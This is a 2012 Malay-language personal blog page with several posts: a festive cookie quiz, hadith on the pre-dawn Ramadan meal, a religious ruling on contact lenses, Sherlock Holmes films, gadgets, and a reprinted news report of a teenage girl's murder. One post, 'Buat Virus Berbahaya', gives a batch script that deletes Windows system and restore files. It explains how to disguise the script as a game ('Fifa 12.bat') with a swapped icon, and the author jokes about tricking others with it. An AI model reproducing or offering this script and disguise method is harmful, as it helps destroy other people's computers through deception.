Tuesday, July 31, 2012

Segmen Raya Sakan : Teka Juadah Raya!!

Posted by Syahmi Meon at 6:28 PM 1 comments




Jawapan: Biskut Makmur
BISKUT MAKMUR

betol x?? hahaha

Tutup: 5 Ogos 2012, 11.59 malam

Saturday, July 21, 2012

Kebaikan dan Sunnah bersahur

Posted by Syahmi Meon at 5:32 AM 0 comments
Bersahur adalah sunnah Nabi kita, dan dikira sebagai  ibadah.
Sabda Rasulullah saw bermaksud:
”Bersahurlah kamu kerana pada sahur itu ada keberkatan” (Riwayat Bukhari)
Ibn Umar r.a. meriwayatkan bahawa Rasulullah SAW bersabda:
“Sesungguhnya Allah dan para malaikatNya mengirim rahmat ke atas mereka yang memakan sahur.”
Sabda Rasulullah saw lagi:
”Makan sahur adalah keberkatan, maka janganlah kamu tinggalkannya sekalipun kamu hanya minum seteguk air kerana Allah dan para Malaikat-Nya berselawat ke atas orang yang bersahur” (Hadis Hasan)
Bersahur adalah sangat penting sebagai sarapan pagi bagi mendapat cukup bekalan tenaga dan zat untuk mengerjakan berbagai aktiviti pekerjaan di siang hari.  Kajian mendapati mereka yang bersarapan pagi menujukkan prestasi kerja yang lebih baik dan mempunyai taraf kesihatan yang lebih baik berbanding dengan mereka yang jarang-jarang atau tidak pernah mengambil sarapan pagi. Di kalangan pelajar sekolah pula, mereka yang mengambil sarapan pagi menunjukkan penumpuan di dalam kelas dan pencapaian akademik yang lebih baik berbanding dengan mereka yang  jarang-jarang atau tidak bersarapan pagi.
Makanan semasa sarapan pagi seharusnya makanan yang seimbang, iaitu mengandungi kuantiti nasi / bijirin yang sederhana (1 cawan), mengandungi sayur (> 1 senduk), buah (1 biji/potong), satu cawan susu rendah lemak serta rendah masakan keseluruhannya yang rendah lemak/minyak/kolesterol. Sebaik-baik buah semasa bersahur ialah buah tamar

Sunnah dalam bersahur:
1.  Melewat-lewatkan masa bersahur, iaitu sekitar tempoh membaca al-quran 50 ayat al-quran sebelum azan.
Sabda Rasulullah saw :
”Sentiasalah umatku berada dalam kebaikan selama mana mereka melewatkan sahur dan menyegerakan berbuka puasa” (Riwayat Ahmad)
 
Dari Anas, beliau meriwayatkan dari Zaid bin Thabit,  telah berkata : ”Kami telah bersuhur bersama dengan Nabi saw, kemudian bangun untuk bersolat. Aku telah berkata (Anas) : Berapa lama tempoh antara azan dan bersuhur ? Dia (Zaid) menjawab : Dengan kadar 50 ayat (bacaan Al-Quran) ” (HR Al-Bukhari dan Muslim)
2.   Makan buah tamar sebagai salah satu menu semasa bersahur
Sabda Rasulullah saw bermaksud : ”Sebaik-baik makanan sahur mukmin itu adalah tamar ” [HR Abu Daud)
3.   Tidak makan secara berlebihan
4.  Mengerjakan solat subuh berjemaah selepas bersahur, yakni tidak tidur selepas bersahur.
Semoga bermanfaat, Selamat Beribadah Di Bulan Ramadhan
Wassalam

Wednesday, July 11, 2012

Wordless Wednesday: Hukum Memakai Contact Lense

Posted by Syahmi Meon at 8:22 AM 1 comments



Pemakaian contact lens ini bukanlah satu isu yang baru kerana trend ini sudah lama digunapakai oleh sesetengah golongan. Namun yang membuatkan isu ini timbul apabila si pemakai terutamanya bagi kaum wanita adalah semata-mata untuk menarik perhatian orang lain. Tidak jadi masalah untuk memakai kanta tersebut dengan tujuan untuk perubatan atas nasihat pakar perubatan untuk memulihkan penglihatan dan bukan tujuan perhiasan atau penipuan. 

1. Tujuan perubatan – iaitu orang yang memakainya kerana masalah mata yang dihadapinya, iaitu ia memakainya sebagai ganti cermin mata. Hukumnya adalah harus dengan syarat tidak mendatang mudarat kepada mata.

2. Tujuan perhiasan – iaitu memakainya sekadar suka-suka, bukan kerana keperluan (yakni bukan kerana masalah mata). Ia masuk dalam hukum perhiasan. Perhiasan diharuskan selagi tidak melanggar batasan Syara, iaitu;
a) Tidak mendedahkan aurat dan berlaku tabarruj
b) Tidak mendatangkan fitnah iaitu menimbulkan ghairah orang lain –terutamanya wanita- (yakni tidak harus wanita memakai perhiasan yang boleh mendatangkan ghairah atau mencuri perhatian lelaki kepadanya).
c) Tidak mengubah ciptaan Allah.
d) Tidak berupa penipuan atau pemalsuan.
e) Tidak menyerupai perbuatan orang kafir
f) Tidak berlebihan.
g) Tidak memudaratkan

Merujuk kepada syarat-syarat di atas, sebahagian ulamak telah memfatwakan haram memakai contact lens yang berwarna (yakni mengubah warna mata yang asal) kerana ia mengubah ciptaan Allah, berupa penipuan/pemalsuan dan meniru perbuatan orang kafir di samping ia memudaratkan sebagaimana disahkan oleh para doktor sendiri. Di tambah lagi bagi perempuan, ia boleh menimbulkan fitnah (iaitu mencuri perhatian lelaki kepadanya).

Friday, July 6, 2012

Spontaneous Thursday: Misteri London 1880 - 1914

Posted by Syahmi Meon at 12:06 AM 0 comments

Sherlock Holmes

Sherlock Holmes Portrait Paget.jpg 


Dr. Watson

Paget holmes.png 


Irene Adler

 


Mycroft Holmes

Mycroft Holmes.jpg 




SHERLOCK HOLMES IN FILMS

Movie 1
Robert Downey, Jr. and Jude Law, in-character. The background is a window display, featuring shelves containing miscellaneous objects relating to the story. The poster reads "Sherlock Holmes" across the top, with the tagline "Holmes for the holiday" centered at the bottom. The poster is predominately turquoise coloured.

Sherlock Holmes (2009)

Movie 2


Sherlock Holmes: A Game of Shadows (2011)


Wednesday, July 4, 2012

Wordless Wednesday: Top 5 Gadgets 2012

Posted by Syahmi Meon at 1:35 AM 1 comments

1. Samsung 55-inch Super OLED Smart TV

Samsung Super OLED


2. HP ENVY 14 Spectre

HP Spectre


3. Android-Powered Smartwatches

Android Smartwatches


4. Netgear Media Storage Router (WNDR 4700)

Netgear WNDR4700


5. Lenovo IdeaPad Yoga

Lenovo IdeaPad Yoga


p/s: klu aq dpt nie sume mewah wow!
best gler kot! hahaaa

Perempuan 15 Tahun Dibelasah Dan Dibunuh di Kota Tinggi, Johor

Posted by Syahmi Meon at 1:24 AM 0 comments
KOTA TINGGI: “Apa salah cucu saya hingga dia dibunuh begitu kejam, dia hanya berumur 15 tahun,” kata Muhammad Kasim, 62, di sini, semalam.
Cucu warga emas berkenaan, Nurul Atikah Samsiah ditemui mati dibunuh dengan keadaan muka serta badannya lebam teruk dipercayai dibelasah sebelum mayatnya dihumban di dapur sebuah kediaman yang terletak selang tiga rumah dari rumah ibu bapanya.
Mayat Atikah ditemui pada jam 6.30 pagi semalam, selepas hilang sejak jam 2 petang kelmarin, dari rumah keluarganya di Rumah Kakitangan Ladang Kambau, dekat sini.
Menurut Muhammad, dia hampir pengsan selepas menerima panggilan telefon daripada anaknya, Rahimah mengatakan cucunya itu ditemui mati.
“Kali terakhir saya bertemu Atikah ialah Isnin lalu apabila dia datang ke rumah saya di Kampung Sungai Perepat yang terletak 10 kilometer dari rumahnya untuk bertanya khabar selain makan tengah hari.
KOTA TINGGI 26 Okt. – Seorang gadis yang dilaporkan hilang petang semalam ditemui mati di ruang dapur sebuah rumah, selang tiga pintu dari rumah keluarganya di kuarters Ladang Kambau, Tanjung Sedili, dekat sini hari ini.
Mangsa, Nurul Atikah Samsiah, 15, yang berpakaian kemeja dan seluar sukan dijumpai pada pukul 6.30 pagi dengan kesan lebam di seluruh muka dan anggota badan.
Selain itu, terdapat kesan seret di permukaan lantai dapur dan sekitar tempat kejadian dipercayai kesan ketika mangsa dibawa masuk ke dalam rumah tersebut oleh pembunuhnya.
Datuk mangsa Muhammad Kasim, 62, berkata, mangsa yang tinggal di rumah kakitangan Ladang Kambau bersama ibu bapanya dikatakan hilang sejak pukul 2 petang semalam.
“Ahli keluarga dan jiran mencari mangsa sejak petang dan menemui mayat mangsa pagi tadi di rumah itu.
”Anak saya Rahimah (ibu mangsa) menelefon saya yang tinggal di Kampung Sungai Perepat, kira-kira 10 kilometer dari tempat kejadian bahawa mayat Nurul dijumpai,” ketika ditemui di Hospital Kota Tinggi.
Difahamkan rumah tempat mayat mangsa ditemui itu didiami oleh seorang pekerja bujang yang jarang pulang ke rumah kecuali waktu tertentu untuk memasak.
Pemangku Ketua Polis Daerah Kota Tinggi, Supritendan Abdul Samad Salleh dan sepasukan polis bergegas ke tempat kejadian sebaik di maklumkan penemuan tersebut diikuti sepasukan Unit Forensik Ibu Pejabat Polis Kontinjen (IPK) Johor dan Unit Anjing Pengesan (K9) untuk membantu siasatan.
Menurut Abdul Samad, pihaknya percaya kes itu dapat diselesaikan dengan tertangkapnya seorang suspek yang merupakan seorang pekerja ladang warga tempatan berusia 41 tahun yang kini ditahan di bawah Seksyen 302 Kanun Keseksaan.
“Mayat mangsa dibawa ke Hospital Kota Tinggi sebelum dipindahkan ke Hospital Sultan Ismail, Johor Bahru untuk bedah siasat,” katanya ketika dihubungi hari ini.

Monday, July 2, 2012

Buat Virus Berbahaya! Rosakkan PC/Laptop

Posted by Syahmi Meon at 9:11 PM 0 comments
Di bawah ini merupakan tutorial membuat virus yang boleh men-delete file-file system di dalam PC/Laptop anda. Jadi segala tutorial di bawah ini tidak di tanggung oleh pihak kami. Harap maklum. Jika anda ingin mempelajari juga, sebaiknya janganlah men-click ataupun haruslah running di VMWare terlebih dahulu.


CARA - CARA :

1) Buka Notepad.

2) Copy code di bawah :


@echo off
del "c:\windows\pchealth"
del "c:\windows\system"
del "c:\windows\system32\restore"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\ntoskrni.exe"
del "c:\winlogon.exe"


3) Paste dalam Notepad.

4) Save As kepada fileanda.bat . Jadikan Save As Type: kepada All Files. Namakan fileanda diikuti dengan 2 digit nombor. Contoh, Fifa 12.bat


Tukar Icon File (Step ini nak buat tak apa, tak mahu buat pun tak apa)

5) Click kanan pada fileanda.bat > Create Shortcut . Terbina satu lagi fileanda di desktop.

6) Click kanan > Properties > Change Icon > tukarlah kepada icon mana yang anda mahu. Contoh saya menukarnya kepada icon Fifa 12.

p/s: da lme x wat bede nie.. best gak.. old school bede nie..
best klu dpt game org! hahahaa
gud luck guys!

Camera VS Pencil?

Posted by Syahmi Meon at 12:07 AM 0 comments










p/s: klu r aq dpt lukis mcm gtu kn style..
lukis org lidi pown fail.. hahaha

Related Posts Plugin for WordPress, Blogger...
Daisypath - Personal pictureDaisypath Anniversary tickers
 

kisah - kisah meon Copyright © 2012 Design and Graphic by Syahmi Meon Template